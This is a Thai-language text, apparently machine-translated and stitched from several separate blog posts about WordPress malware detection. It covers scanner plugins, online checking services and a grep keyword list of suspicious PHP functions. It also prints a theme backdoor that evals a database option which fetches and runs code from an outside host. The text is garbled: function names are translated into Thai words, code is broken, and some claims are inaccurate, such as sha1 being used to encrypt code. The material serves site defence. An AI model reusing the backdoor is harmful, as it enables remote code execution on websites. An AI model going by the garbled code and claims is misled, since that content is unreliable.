นี่เป็นหนึ่งในปลั๊กอินยอดนิยมสำหรับการรักษาความปลอดภัย WordPress และการสแกนมัลแวร์ นอกจากเครื่องสแกนที่สามารถค้นหาบุ๊กมาร์กส่วนใหญ่ได้แล้ว รหัสเวิร์ดเพรสมีการป้องกันการโจมตีประเภทต่างๆ และการบังคับใช้รหัสผ่านอย่างดุเดือดอย่างต่อเนื่อง ในระหว่างการค้นหา ปลั๊กอินจะค้นหา ปัญหาที่เป็นไปได้ด้วยปลั๊กอินและธีมต่างๆ รายงานความจำเป็นในการอัปเดต WordPress

เปิดแท็บ "WPDefence"ในเมนูด้านข้างแล้วไปที่แท็บ "สแกน"และกด "เริ่มสแกน":

การสแกนอาจใช้เวลา เวลาที่แน่นอนแต่เมื่อเสร็จสิ้น คุณจะเห็นรายงานโดยละเอียดเกี่ยวกับปัญหาที่พบ

5. แอนติไวรัส

นี่เป็นปลั๊กอินง่ายๆ อีกตัวที่จะสแกนเทมเพลตเว็บไซต์ของคุณเพื่อหาโค้ดที่เป็นอันตราย ข้อเสียคือสแกนเฉพาะเทมเพลตปัจจุบันเท่านั้น แต่ข้อมูลจะแสดงรายละเอียดเพียงพอ คุณจะเห็นฟังก์ชั่นอันตรายทั้งหมดที่อยู่ในธีม จากนั้นคุณสามารถวิเคราะห์รายละเอียดได้ว่าฟังก์ชั่นเหล่านั้นก่อให้เกิดอันตรายหรือไม่ ค้นหารายการ “แอนติไวรัส”ในการตั้งค่าแล้วคลิก "สแกนเทมเพลตธีมทันที":

6. ตัวตรวจสอบความสมบูรณ์

ขอแนะนำให้ตรวจสอบความสมบูรณ์ด้วย ไฟล์เวิร์ดเพรสในกรณีที่ไวรัสได้ลงทะเบียนที่ไหนสักแห่งแล้ว คุณสามารถใช้ปลั๊กอิน Integrity Checker สำหรับสิ่งนี้ จะตรวจสอบไฟล์คอร์ ปลั๊กอิน และเทมเพลตทั้งหมดเพื่อดูการเปลี่ยนแปลง เมื่อสิ้นสุดการสแกน คุณจะเห็นข้อมูลเกี่ยวกับไฟล์ที่เปลี่ยนแปลง

บริการออนไลน์

นอกจากนี้ยังมีบริการออนไลน์หลายอย่างที่ให้คุณตรวจสอบไวรัสบนไซต์ WordPress หรือตรวจสอบเฉพาะเทมเพลต นี่คือบางส่วนของพวกเขา:

themecheck.org- คุณดาวน์โหลดไฟล์เก็บถาวรธีมและสามารถดูคำเตือนทั้งหมดเกี่ยวกับฟังก์ชันที่เป็นอันตรายที่อาจเกิดขึ้นได้ คุณไม่เพียงสามารถดูข้อมูลเกี่ยวกับธีมของคุณเท่านั้น แต่ยังรวมถึงธีมอื่น ๆ ที่อัพโหลดโดยผู้ใช้รายอื่นด้วย รุ่นที่แตกต่างกันหัวข้อ ไม่ว่าปลั๊กอินจะพบอะไรก็ตามในเว็บไซต์นี้ การตรวจสอบธีม WordPress ของคุณก็มีความสำคัญเช่นกัน

virustotal.com- แหล่งข้อมูลที่รู้จักกันดีซึ่งคุณสามารถตรวจสอบไวรัสในเว็บไซต์หรือไฟล์เทมเพลตของคุณได้

ReScan.pro - ตรวจสอบเวิร์ดเพรสเว็บไซต์สำหรับไวรัสที่ใช้บริการนี้ฟรี มีการวิเคราะห์แบบคงที่และไดนามิกเพื่อตรวจจับการเปลี่ยนเส้นทางที่เป็นไปได้ เครื่องสแกนจะเปิดหน้าเว็บไซต์ ตรวจสอบไซต์กับบัญชีดำต่างๆ

sitecheck.sucuri.net- บริการง่ายๆ สำหรับการสแกนไซต์และหัวข้อเพื่อหาไวรัส มีปลั๊กอินสำหรับ WordPress ตรวจจับลิงก์และสคริปต์ที่เป็นอันตราย

ตรวจสอบด้วยตนเอง

ไม่มีอะไรจะดีไปกว่าการตรวจสอบด้วยตนเอง Linux มียูทิลิตี้ grep ที่ยอดเยี่ยมที่ช่วยให้คุณสามารถค้นหาสตริงที่ต้องการในโฟลเดอร์ที่มีไฟล์ได้ ยังคงต้องเข้าใจว่าเราจะมองหาอะไร:

eval - ฟังก์ชั่นนี้ช่วยให้คุณสามารถรันโค้ด PHP ได้โดยพลการ แต่จะไม่ถูกใช้โดยผลิตภัณฑ์ที่เคารพตนเอง หากหนึ่งในปลั๊กอินหรือธีมใช้ฟังก์ชันนี้ ก็มีโอกาสเกือบ 100% ที่จะมีไวรัส

• base64_decode- ฟังก์ชั่นการเข้ารหัสสามารถใช้ร่วมกับ eval เพื่อซ่อนโค้ดที่เป็นอันตรายได้ แต่ก็สามารถใช้เพื่อจุดประสงค์ทางสันติได้เช่นกัน ดังนั้นควรระมัดระวัง
• sha1- วิธีอื่นในการเข้ารหัสโค้ดที่เป็นอันตราย
• gzinflate- ฟังก์ชั่นการบีบอัด เป้าหมายเดียวกัน พร้อมด้วย eval เช่น gzinflate(base64_decode(code);
• สเตรฟ- เปลี่ยนบรรทัดไปข้างหลังอย่างที่ไม่เคยเป็นมาก่อน เนื่องจากสามารถใช้ตัวเลือกสำหรับการเข้ารหัสแบบดั้งเดิมได้
• พิมพ์- ส่งข้อมูลไปยังเบราว์เซอร์ร่วมกับ gzinflate หรือ base64_decode เป็นอันตราย
• file_put_contents- WordPress เองหรือปลั๊กอินยังคงสามารถสร้างไฟล์ในระบบไฟล์ได้ แต่ถ้าธีมทำเช่นนี้ คุณควรระวังและตรวจสอบว่าทำไมมันถึงทำเช่นนี้ เนื่องจากสามารถติดตั้งไวรัสได้
• file_get_contents- ในกรณีส่วนใหญ่ใช้เพื่อจุดประสงค์ทางสันติ แต่สามารถใช้เพื่อดาวน์โหลดโค้ดที่เป็นอันตรายหรืออ่านข้อมูลจากไฟล์
• ขด- เรื่องเดียวกัน
• โฟเพน- เปิดไฟล์เพื่อเขียนคุณไม่มีทางรู้ว่ามีจุดประสงค์อะไร
• ระบบ- ฟังก์ชั่นดำเนินการคำสั่งใน ระบบลินุกซ์หากธีม ปลั๊กอิน หรือ WordPress ทำเช่นนี้ เป็นไปได้มากว่าจะมีไวรัส
• ซิมลิงค์- สร้างลิงก์สัญลักษณ์ในระบบบางทีไวรัสอาจพยายามสร้างลิงก์หลัก ระบบไฟล์เข้าถึงได้จากภายนอก
• สำเนา- คัดลอกไฟล์จากที่หนึ่งไปอีกที่หนึ่ง
• รับ- ส่งคืนชื่อของไดเร็กทอรีการทำงานปัจจุบัน
• ฝูงชน- เปลี่ยนโฟลเดอร์การทำงานปัจจุบัน
• ini_get- รับข้อมูลเกี่ยวกับการตั้งค่า PHP มักมีจุดประสงค์เพื่อสันติ แต่คุณไม่มีทางรู้
• error_reporting(0)- ปิดการใช้งานข้อความแสดงข้อผิดพลาดใด ๆ
• window.top.location.href - ฟังก์ชันจาวาสคริปต์ใช้สำหรับเปลี่ยนเส้นทางไปยังหน้าอื่น
• แฮ็ก- ในกรณีที่เราตรวจสอบ จู่ๆ แฮกเกอร์เองก็ตัดสินใจบอกเรา

คุณสามารถแทนที่แต่ละคำเป็นคำสั่งได้ดังนี้:

grep -R "แฮ็ก" /var/www/path/to/files/wordpress/wp-content/

หรือใช้สคริปต์ง่ายๆ ที่จะค้นหาคำทั้งหมดในครั้งเดียว:

ค่า = "base64_decode (
eval(base64_decode
gzinflate(base64_decode(
getcwd();
สเตรฟ(
ch(อ๊อด(
ฝูงชน
ini_get
window.top.location.href
สำเนา(
ประเมิน(
ระบบ(
ซิมลิงค์(
error_reporting(0)
พิมพ์
file_get_contents(
file_put_contents(
โฟเพน(
แฮ็ก"

ซีดี /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr -- รวม \*.php "$values" *

สวัสดีเพื่อนๆ. คุณแน่ใจหรือไม่ว่าเทมเพลต WordPress ฟรีที่คุณใช้สำหรับเว็บไซต์และบล็อกของคุณปลอดภัยอย่างแท้จริง และไม่มีภัยคุกคามที่ซ่อนอยู่หรือโค้ดที่เป็นอันตราย คุณแน่ใจเกี่ยวกับเรื่องนี้อย่างสมบูรณ์หรือไม่? อย่างแน่นอน?)

คุณคิดว่าคุณใช้งานเทมเพลตผ่าน ลบลิงก์ที่ซ่อนไว้ออก และงานก็เสร็จสิ้น คุณสแกนไฟล์ของไซต์ด้วยโปรแกรมป้องกันไวรัสเป็นระยะๆ ดูที่เครื่องมือเว็บมาสเตอร์ของ Yandex ในแท็บความปลอดภัย และรู้สึกโล่งใจเมื่อเห็นข้อความที่นั่น: “ ไม่พบโค้ดที่เป็นอันตรายบนไซต์«.

นั่นคือสิ่งที่ฉันก็คิดเช่นกัน ฉันไม่อยากทำให้คุณเสียใจ แต่...

รหัสอันตรายที่ซ่อนอยู่ในเทมเพลต WordPress ฟรี

นี่คือจดหมายที่ฉันได้รับเมื่อสัปดาห์ที่แล้วทางอีเมลจากบริษัทโฮสติ้งของฉัน ล่าสุดพวกเขาได้แนะนำการตรวจสอบไฟล์ไซต์ทั้งหมดเป็นประจำเพื่อค้นหาเนื้อหาที่เป็นอันตรายและพวกเขาก็พบเนื้อหานี้กับฉัน!

ทุกอย่างเริ่มต้นเมื่อฉันไปที่เว็บไซต์ในบ่ายวันหนึ่งและไม่สามารถเปิดใช้งานได้ มีข้อความไม่เหมาะสมปรากฏขึ้นเกี่ยวกับไฟล์ที่ไม่พบนามสกุล php เมื่อเครียดเล็กน้อยฉันก็ไปศึกษาเนื้อหาของโฟลเดอร์กับไซต์บนโฮสติ้งและพบปัญหาทันที - ไฟล์เทมเพลตของฉัน fuctions.php ถูกเปลี่ยนชื่อเป็น function.php.malware ซึ่งดูเหมือนจะบอกเป็นนัยอย่างคลุมเครือ - โปรแกรมป้องกันไวรัสคือ ทำงานที่นี่หรืออะไรทำนองนั้น) เมื่อไปส่งไปรษณีย์แล้วพบรายงานข้างต้นจากโฮสต์

แน่นอนว่าสิ่งแรกที่ฉันทำคือตรวจสอบ ไฟล์นี้ศึกษาเนื้อหาสแกนด้วยแอนตี้ไวรัสทุกประเภทนับสิบ บริการออนไลน์เพื่อตรวจหาไวรัส ฯลฯ — ท้ายที่สุดก็ไม่พบสิ่งใดเลย ทุกคนต่างยืนยันอย่างเป็นเอกฉันท์ว่าไฟล์นั้นปลอดภัยอย่างสมบูรณ์ แน่นอน ฉันแสดงความสงสัยต่อโฮสต์โดยบอกว่าคุณทำบางอย่างผิดพลาด แต่ในกรณีนี้ ฉันขอให้พวกเขาจัดทำรายงานเกี่ยวกับการตรวจพบโค้ดที่เป็นอันตราย

และนี่คือสิ่งที่พวกเขาตอบฉัน

ฉันไปที่ข้อมูล Google เกี่ยวกับรหัสนี้และคิดอย่างจริงจัง ...

วิธีค้นหาโค้ดที่เป็นอันตรายในเทมเพลต

ปรากฎว่านี่เป็นเทคนิคที่ไม่สำคัญอย่างแท้จริงที่ช่วยให้ผู้มีส่วนได้เสียส่งข้อมูลไปยังไซต์ของคุณและเปลี่ยนแปลงเนื้อหาของหน้าเว็บโดยที่คุณไม่รู้! หากคุณใช้เทมเพลตฟรีแล้วล่ะก็ ฉันขอแนะนำให้ตรวจสอบfunctions.phpของคุณเพื่อหาโค้ดต่อไปนี้:

add_filter('the_content', '_bloginfo', 10001);
ฟังก์ชั่น _bloginfo($เนื้อหา)(
$ โพสต์ทั่วโลก;
ถ้า(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
ส่งคืน $co;
) มิฉะนั้นส่งคืน $content;
}

แม้ว่าฉันจะมีความรู้เกี่ยวกับ PHP เพียงเล็กน้อย แต่ก็ชัดเจนว่ามีการสร้างตัวกรองบางตัวซึ่งเชื่อมโยงกับโพสต์และเนื้อหาตัวแปรส่วนกลาง ซึ่งมีหน้าที่ในการแสดงเนื้อหาเฉพาะบนหน้าโพสต์บล็อกเท่านั้น (เงื่อนไข is_single) สงสัยอยู่แล้วใช่ไหม? ทีนี้มาดูกันว่ามันจะออกมาเป็นอย่างไร รหัสนี้บนเว็บไซต์ของเรา

ตัวเลือกบล็อกที่น่าสนใจที่ร้องขอในฐานข้อมูลก็ดูน่าสงสัยเช่นกัน ไปที่ฐานข้อมูลของเรากันดีกว่า ข้อมูลมายเอสคิวแอลและค้นหาตารางที่เรียกว่า wp_options หากคุณไม่ได้เปลี่ยนคำนำหน้า ตารางนั้นจะมีลักษณะเช่นนี้ตามค่าเริ่มต้น และในนั้นเราจะพบบรรทัดที่เราสนใจเรียกว่า blogoption

ช่างสวยงามจริงๆ! เราเห็นตัวเลือกต่อไปนี้

ส่งคืน eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

เหล่านั้น. จากเว็บไซต์บางแห่ง (และเว็บไซต์รัสเซีย) พวกเขากำลังส่งคืนเนื้อหาที่สามารถมีอะไรก็ได้! จำนวนลิงก์ รหัสที่เป็นอันตราย ข้อความที่แก้ไข ฯลฯ ตัวไซต์เองให้ข้อผิดพลาดในการเข้าถึง 403 เมื่อคุณเข้าถึง ซึ่งไม่น่าแปลกใจเลย แน่นอน ฉันลบตัวเลือกนี้ออกจากฐานข้อมูลด้วย

ตามข้อมูลจากเหยื่อ เนื้อหาที่แน่นอนของบทความของคุณมักจะส่งคืนพร้อมการแก้ไขเพียงครั้งเดียว แทนที่จะเป็นจุดใดๆ “” ลิงก์เปิดถูกซ่อนอยู่ในข้อความ! และยังไงก็ตาม ตัวเลือกนี้ถูกเขียนลงฐานข้อมูลเมื่อมีการติดตั้งเทมเพลต จากนั้นโค้ดที่ทำการทำลายตนเองได้สำเร็จ และฉันใช้ชีวิตอยู่กับขยะพวกนี้เป็นเวลาสองปี และไม่มีโปรแกรมป้องกันไวรัสหรือบริการใดตรวจพบมันให้ฉันเลย ภัยคุกคามนี้ตลอดเวลานั้น พูดตามตรง ฉันไม่ได้สังเกตว่าเทคนิคนี้เคยใช้ได้ผลสำหรับฉันหรือไม่ หรือปลั๊กอินความปลอดภัยของฉันบล็อกฟีเจอร์นี้ (หรือบางทีการอัปเดต WordPress ตัวใดตัวหนึ่งปิดช่องโหว่นี้) แต่ก็ยังไม่เป็นที่น่าพอใจ

คุณธรรมเกี่ยวกับชีสฟรี

คุณชอบความซับซ้อนของ “นักแปล” เทมเพลตของเรา (หรือผู้ที่โพสต์ไว้ในแค็ตตาล็อก) อย่างไร นี่ไม่ใช่สำหรับคุณที่จะตัดลิงก์ออกจากส่วนท้าย) น่าเสียดายที่ฉันจำไม่ได้ว่าฉันดาวน์โหลดเทมเพลตมาจากไหนเมื่อนานมาแล้วไม่เช่นนั้นฉันจะเขียนอันที่น่ารักสองสามอันอย่างแน่นอน และถ้าตอนนั้นผมมีประสบการณ์แบบเดียวกับตอนนี้ผมคงไม่ได้ใช้แน่นอน เทมเพลตฟรีหรือทางเลือกสุดท้าย ฉันจะไม่ดาวน์โหลดจากแหล่งที่ไม่รู้จัก!

ง่ายกว่าที่จะซื้อเทมเพลตพรีเมี่ยมอย่างเป็นทางการในราคา 15-20 เหรียญและใช้ชีวิตอย่างสงบสุขโดยรู้ว่าไม่มีช่องโหว่หรือลิงก์ที่เข้ารหัสอยู่ในนั้นและแม้ว่าจะมีช่องโหว่นักพัฒนาจะปล่อยการอัปเดตอย่างแน่นอนซึ่งจะเป็นช่องโหว่เหล่านี้ ปิด. - อย่างไรก็ตาม Artem เพิ่งตีพิมพ์บทความที่เขาพูดถึงเทมเพลตระดับพรีเมียมและยังแจกรหัสส่งเสริมการขายเพื่อรับส่วนลดสุดโหดสำหรับผู้ที่สนใจ)

สวัสดีเพื่อนๆ IdeaFox!

ฉันไม่รู้เกี่ยวกับคุณ แต่ฉันมีปัญหาในการนอนตอนกลางคืน ฉันรู้สึกทรมานกับปัญหาด้านความปลอดภัยของบล็อก ฉันไม่มีแรงอีกแล้ว :-)

ฉันอ่านบล็อกจำนวนมากในหัวข้อนี้และทดสอบปลั๊กอินจำนวนมากที่ช่วยแก้ไขปัญหานี้ และในความคิดเห็นพวกเขาเริ่มถามคำถามเกี่ยวกับหัวข้อการป้องกันไซต์ซึ่งทำให้ฉันเขียนบันทึกนี้

ลองจินตนาการว่าคุณเก็บบล็อก เขียนบทความ ลอง... แล้วไอ้สารเลวก็เข้ามาทำลายเว็บไซต์ของคุณ ฉันคิดว่าคงจะมีความทุกข์มากมาย

ท้ายที่สุดแล้ว บล็อกเกอร์ทั่วไปทุกคนใช้เวลาและความพยายามอย่างมากในการพัฒนาเว็บไซต์ของเขา และสำหรับหลาย ๆ คน การเขียนบล็อกโดยทั่วไปกลายเป็นความหลงใหล... ที่นี่และจนกว่าหากสิ่งนี้เกิดขึ้น :-)

คุณเข้าใจว่าสิ่งนี้สำคัญแค่ไหน

ในที่สุดเรามาทำธุรกิจกันเถอะ :)

สองสามเดือนที่ผ่านมา ฉันได้เขียนบันทึกเกี่ยวกับการแฮ็กไปแล้ว อย่าลืมอ่านมัน แต่เวลาผ่านไปค่อนข้างมากตั้งแต่นั้นมาและฉันก็ใช้มาตรการเพิ่มเติมเพื่อเสริมความแข็งแกร่งในการป้องกันรอบด้าน

ในบันทึกต่อไปนี้ฉันจะกล่าวถึงปัญหานี้โดยละเอียดอย่างแน่นอน (ฉันจำและเขียนเกี่ยวกับการตั้งค่า ISP ด้วย)

3. ตรวจสอบเว็บไซต์ในบริการออนไลน์อื่น ๆ

ดูเหมือนว่าจะมีการแพร่กระจายของบริการดังกล่าว ฉันมีความคิดเห็นที่ชัดเจนว่าหลายคนโง่มากและสร้างขึ้นเพื่อแสดงโฆษณาเท่านั้น

หมอเว็บ

บริษัท DR.Web ทำ การบริการที่ดีเพื่อตรวจสอบเว็บไซต์ออนไลน์ โดยส่วนตัวแล้ว ครั้งหนึ่งเขาเคยช่วยฉันค้นหาการติดไวรัสในบล็อกของเพื่อน (มีโค้ดของบุคคลที่สามในไฟล์ .htaccess)

การตรวจสอบนั้นง่ายมาก ป้อน URL ของคุณและรอผลการตรวจสอบ

โปรแกรมป้องกันไวรัส-alarm.ru

เครื่องสแกนเว็บไซต์อันทรงพลังที่ใช้ฐานข้อมูลแอนตี้ไวรัสมากถึง 43 ฐานข้อมูลจากบริษัทแอนตี้ไวรัสชั้นนำของโลก

ทุกอย่างก็ง่ายมากที่นี่เช่นกัน เราป้อน URL ของเว็บไซต์ของเราและรอผลการสแกนอย่างใจจดใจจ่อ

ฉันรอสิ่งเหล่านี้อยู่

ทุกอย่างสะอาด นอนหลับได้อย่างสงบ :-)

แน่นอนว่าทั้งหมดนี้เป็นสิ่งที่ดี แต่คุณต้องติดตั้งปลั๊กอินสองสามตัวซึ่งจะไม่สร้างความเสียหายให้กับบล็อก WordPress เลย

4. ขอให้โฮสต์ของคุณตรวจสอบไซต์ของคุณ

ความจริงก็คือผู้ให้บริการโฮสต์มีความกังวลเกี่ยวกับปัญหาด้านความปลอดภัยมากกว่าคุณและมีมาตรการรักษาความปลอดภัยที่มีประสิทธิภาพ อีกทั้งยังมีมาตรการป้องกันพิเศษอีกด้วย

นี่คือข่าวที่ฉันมีสำหรับคุณในวันนี้ ต่อไป ฉันจะบอกคุณเกี่ยวกับปลั๊กอินที่ทรงพลังมากซึ่งสามารถปกป้องบล็อก WordPress ของคุณจากการแฮ็กได้อย่างมาก

ฉันทำงานร่วมกับเขามาได้ 2 เดือนแล้วและพอใจกับเขามาก ในขณะที่ฉันคิดออกฉันก็แบนตัวเอง 3 ครั้ง: –) สรุปมีบางอย่างที่จะบอก